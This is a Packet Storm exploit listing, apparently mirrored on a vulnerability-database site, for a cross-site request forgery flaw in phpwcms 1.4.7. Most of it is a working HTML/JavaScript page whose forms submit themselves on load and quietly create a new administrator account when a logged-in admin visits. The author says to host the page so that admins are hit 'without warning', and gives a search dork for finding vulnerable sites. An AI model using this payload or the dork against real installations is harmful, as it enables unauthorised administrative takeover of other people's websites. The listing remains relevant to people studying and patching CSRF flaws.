Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormXecuti0N3rPACKETSTORM:100880
HistoryApr 27, 2011 - 12:00 a.m.

phpwcms 1.4.7 Cross Site Request Forgery

2011-04-2700:00:00
Xecuti0N3r
packetstormsecurity.com
20
JSON
`#(+) Exploit Title: phpwcms v1.4.7 XSRF Vulnerability(Add Admin User)  
#(+) Author : ^Xecuti0n3r  
#(+) E-mail : xecuti0n3r()yahoo.com  
#(+) Category : Web Apps [XSRF]  
#(+) Dork : intext:"phpwcms Copyright"   
#(+) Download Link : http://phpwcms.googlecode.com/files/phpwcms_r412.zip  
#(+) PHPCMS Official website : http://www.phpwcms.de/  
  
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0  
0 _ __ __ __ 1  
1 /' \ __ /'__`\ /\ \__ /'__`\ 0  
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1  
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0  
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1  
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0  
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1  
1 \ \____/ >> Exploit database separated by exploit 0  
0 \/___/ type (local, remote, DoS, etc.) 1  
1 1  
0 [+] Site : 1337day.com 0  
1 [+] Support e-mail : submit[at]1337day.com 1  
0 0  
1 ######################################### 1  
0 I'm ^Xecuti0n3r member from Inj3ct0r Team 1  
1 ######################################### 0  
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1  
  
  
#All you have to do is save the below code as exploit.html  
#Then Host a website with the exploit.html file. A person with admin permissions if visits the site,  
# will automatically add the attacker as Admin without warning ;)  
____________________________________________________________________  
____________________________________________________________________  
Code:  
  
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">  
  
<html>  
<head>  
<title>phpwcms v1.4.7 XSRF Vulnerability(Add Admin User)</title>  
</head>  
  
<body onload="javascript:fireForms()">  
<script language="JavaScript">  
  
function fireForms()  
{  
var count = 2;  
var i=0;  
  
for(i=0; i<count; i++)  
{  
document.forms[i].submit();  
}  
}  
  
</script>  
<H2>phpwcms v1.4.7 XSRF Vulnerability(Add Admin User)</H2>  
<form method="POST" name="form0" action="http://localhost:80/phpwcms.php?do=admin&s=1">  
<input type="hidden" name="form_newloginname" value="admin2"/>  
<input type="hidden" name="form_newpassword" value="admin2pass"/>  
<input type="hidden" name="form_newemail" value="[email protected]"/>  
<input type="hidden" name="form_newrealname" value="fakeadmin2"/>  
<input type="hidden" name="form_feuser" value="2"/>  
<input type="hidden" name="form_active" value="1"/>  
<input type="hidden" name="form_admin" value="1"/>  
<input type="hidden" name="form_aktion" value="create_account"/>  
<input type="hidden" name="Submit" value="send user data"/>  
</form>  
  
</body>  
</html>  
  
########################################################################  
(+)Exploit Coded by: ^Xecuti0N3r  
(+)Special Thanks to: MaxCaps, d3M0l!tioN3r, aNnIh!LatioN3r  
(+)Gr33ts to : Inj3ct0r Operators Team : r0073r * Sid3^effectS * r4dc0re (www.1337day.com) + All the 31337 Members :)  
(+)<3 to :Indian Cyber Army & Indishell Crew  
########################################################################  
`
JSON